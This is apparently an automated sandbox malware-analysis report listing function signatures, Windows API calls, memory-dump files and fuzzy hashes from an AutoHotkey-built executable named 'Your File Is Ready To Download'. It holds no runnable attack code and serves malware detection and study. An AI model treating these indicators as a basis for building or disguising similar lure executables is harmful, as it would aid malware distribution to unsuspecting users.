
                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                          • String ID: AHK Mouse
                                                                                                                                                                                                                          • API String ID: 2372642624-1022267635
                                                                                                                                                                                                                          • Opcode ID: 41e1bf0884d4d22b0c023acbabe27d07048347046e36961ea91cca6188895307
                                                                                                                                                                                                                          • Instruction ID: 616d2b88fc25e42bf00dc7f758e0de2bc3c1f4f88e400240b1a6d1af86e87663
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41e1bf0884d4d22b0c023acbabe27d07048347046e36961ea91cca6188895307
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27F01771620B8181FB1AEB63B9447E923A1AB8CBC4F584424EB464B2B4EF3CC4868350
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Visible$EnumForegroundLongWindows_wcstoui64
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4171984316-0
                                                                                                                                                                                                                          • Opcode ID: 335439f4e68c99857adbed605d794ed07292af58113ad0c3d889f7cb00e45202
                                                                                                                                                                                                                          • Instruction ID: 50957558d2bac65d5a0f0301039e8070d74cf8cf8d59faecbdf0c4474ac59b39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 335439f4e68c99857adbed605d794ed07292af58113ad0c3d889f7cb00e45202
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8514D72609BC089EB769FA694403E933F0F798BC4F844125EB4D47AA8EF38C695C350
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDecodePointer.NTDLL(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9ABD
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9ACD
                                                                                                                                                                                                                            • Part of subcall function 00000001400CC12C: _errno.LIBCMT ref: 00000001400CC135
                                                                                                                                                                                                                            • Part of subcall function 00000001400CC12C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CC140
                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9B4B
                                                                                                                                                                                                                            • Part of subcall function 00000001400CF338: Sleep.KERNEL32(?,?,00000000,00000001400C9B3B,?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB), ref: 00000001400CF37F
                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9B5B
                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,?,?,00000001400C9BA9,?,?,?,?,00000001400CA6AB,?,?,?,?,?,?,?), ref: 00000001400C9B68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3588582179-0
                                                                                                                                                                                                                          • Opcode ID: b795dc57f4cb8a3d5a22db6d4e355363c93c1ec374df195943046e22bbb00258
                                                                                                                                                                                                                          • Instruction ID: 3f557c3126f830030184acf8fbfecfe3d8ac381e203001ca69663bd1b9d35383
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b795dc57f4cb8a3d5a22db6d4e355363c93c1ec374df195943046e22bbb00258
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D214F31316B84A1EA4A9F63FA483D9A361B74DBD0F444425EB4E477B5DB3CD4868310
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardCloseCurrentEnumGlobalProcessTimerUnlockWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 555064778-0
                                                                                                                                                                                                                          • Opcode ID: 512200af9b421bcc91f46b38394b70415b835aed18dba499327a4d27b5a3b211
                                                                                                                                                                                                                          • Instruction ID: 0cdf5ddba3f1d893595b21aa374ca929dea06b1aa34aba6674c1527ddf9d8a6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512200af9b421bcc91f46b38394b70415b835aed18dba499327a4d27b5a3b211
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22212335215A8685EA56DF23E8003D973A5FB8CBD1F088522EF4957334DFB9C486CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 2803490479-457448710
                                                                                                                                                                                                                          • Opcode ID: 962475862ce58a501ca017868885b293181f08d73a3d73935b49d3331adabad2
                                                                                                                                                                                                                          • Instruction ID: c16a91a66321830c91e641045377a95d697e7605c098d77f630e48ad81b416ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 962475862ce58a501ca017868885b293181f08d73a3d73935b49d3331adabad2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DD19F73205B8085EB629B22E8007DA77A5F34CBD8F444126EF9947BB9DB39C656C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00000001,00000000,00000000,00000000,000000014000599A), ref: 000000014001E84D
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00000001,00000000,00000000,00000000,000000014000599A), ref: 000000014001EA8E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: %s\%s$Out of memory.
                                                                                                                                                                                                                          • API String ID: 514040917-1641153398
                                                                                                                                                                                                                          • Opcode ID: 7bb5f6392c13de32ed954d73445a8d930afbff67819e6940ae5ed36bc8276266
                                                                                                                                                                                                                          • Instruction ID: 36179cfa48576f1010de6119c94513e0e14121ed8a6e5d825468c209052811d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb5f6392c13de32ed954d73445a8d930afbff67819e6940ae5ed36bc8276266
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E481A132225B8191EA66DB22E4007DE7360FB48BF4F541316BB6E5BAE9EF39C505C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$KillTimerwcsncpy
                                                                                                                                                                                                                          • String ID: call
                                                                                                                                                                                                                          • API String ID: 2737708082-3431870270
                                                                                                                                                                                                                          • Opcode ID: 37d7ff779abc14d6e1ecb63fb7378b9a311257a463db1f0f604546463304d27f
                                                                                                                                                                                                                          • Instruction ID: 852a91b1c94f6d021760ec1a1785789ef70f95e0ea24978204527d4336cfa0cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37d7ff779abc14d6e1ecb63fb7378b9a311257a463db1f0f604546463304d27f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE8149F220878086FB6ADF62B5503E977A4E79CFD4F585015EB490B6BACB38C950C744
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountForegroundTextTick
                                                                                                                                                                                                                          • String ID: N/A
                                                                                                                                                                                                                          • API String ID: 3416458291-2525114547
                                                                                                                                                                                                                          • Opcode ID: df7a5117c564b3d00e730dad4c93e652198f1c0a0ad2c18a70f066b6c9ef4452
                                                                                                                                                                                                                          • Instruction ID: 0f917789c4035ce941d36a2c65b6ceb932b185ad6201de78cb80a006d4cb495e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df7a5117c564b3d00e730dad4c93e652198f1c0a0ad2c18a70f066b6c9ef4452
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7316A76225B4086EB2ACB57E440BE8B7B1FB8CF80F44911AAF4A1B374DB38C451D710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundVisible$AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 559202094-0
                                                                                                                                                                                                                          • Opcode ID: 6248c192427a1d3dd99ebe04f6433db0eebba08908ab2fe341e3bec2794d360d
                                                                                                                                                                                                                          • Instruction ID: 1a6984598fb14b8e63d9e91294adc971c0daecd6412528570a7c21e0056d2ccb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6248c192427a1d3dd99ebe04f6433db0eebba08908ab2fe341e3bec2794d360d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3513032A14B8495EB769F97A4443EA63F4FB8D7C0F888425AB89437A9DF78C495C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2819658684-0
                                                                                                                                                                                                                          • Opcode ID: e44d9751ab83f9eac3822172d4e37df1e53dc9dee7fe53149ab32d126ed00420
                                                                                                                                                                                                                          • Instruction ID: 9189f30b2e790fbefeec2a5cd05824a462f3852bbb78a9110cc9fbecedb52df9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e44d9751ab83f9eac3822172d4e37df1e53dc9dee7fe53149ab32d126ed00420
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3216D7520974192FA5BAB53E8013EEA6A5BB4CBD8F044021BF89477B5EF3CC891DB50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ProcessThread$ClassNameText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3420357866-0
                                                                                                                                                                                                                          • Opcode ID: 8b5372ecae805b86ce8566f726c3a3ba7e0e2a4a0a5f6b5cfe6ab6aa161a5fdb
                                                                                                                                                                                                                          • Instruction ID: 0e1ef68aac705a4c90e161c2664fe846c7d83e4fee0df37d1276a1d9e67e7a16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5372ecae805b86ce8566f726c3a3ba7e0e2a4a0a5f6b5cfe6ab6aa161a5fdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F216D32220AC581EB529F66D8403F967A4EB49FC8F189425EF494B6A8DF38C546C720
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Initializemalloc
                                                                                                                                                                                                                          • String ID: No tray mem$Tray
                                                                                                                                                                                                                          • API String ID: 88790506-3325046031
                                                                                                                                                                                                                          • Opcode ID: d623b4ffe890f9daef19006813c742b567f3ddde7394d1dc4923c8e769e721de
                                                                                                                                                                                                                          • Instruction ID: e5c9d927c7f28865d76628b3a3a17fca7ea3edadf40f9819692fffc56e8c860a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d623b4ffe890f9daef19006813c742b567f3ddde7394d1dc4923c8e769e721de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF717931115B5085FB0B8F96BC813C577A9B76DB90FA88229DF988B7B0DB78C462C354
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400673E0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
                                                                                                                                                                                                                            • Part of subcall function 00000001400673E0: IsWindowVisible.USER32 ref: 0000000140067434
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00000001400497BF
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400361D0), ref: 00000001400498A3
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8EEC: _errno.LIBCMT ref: 00000001400C8F04
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8EEC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C8F0F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundMoveRectVisible_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: default
                                                                                                                                                                                                                          • API String ID: 3007188186-3814588639
                                                                                                                                                                                                                          • Opcode ID: 8b502d7487ee17e2c685ed1ef760bf9796494804628a9d6ca811dd9cef6c5e66
                                                                                                                                                                                                                          • Instruction ID: fcf47a9b2b5d2d7b536f1583ee6bd04e2208299d92ace3e60e17a6308ce8fb36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b502d7487ee17e2c685ed1ef760bf9796494804628a9d6ca811dd9cef6c5e66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5841583261474086F766EB2BA4407DA63A0E78DBD0F494035BF4A477AADF78D841C744
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
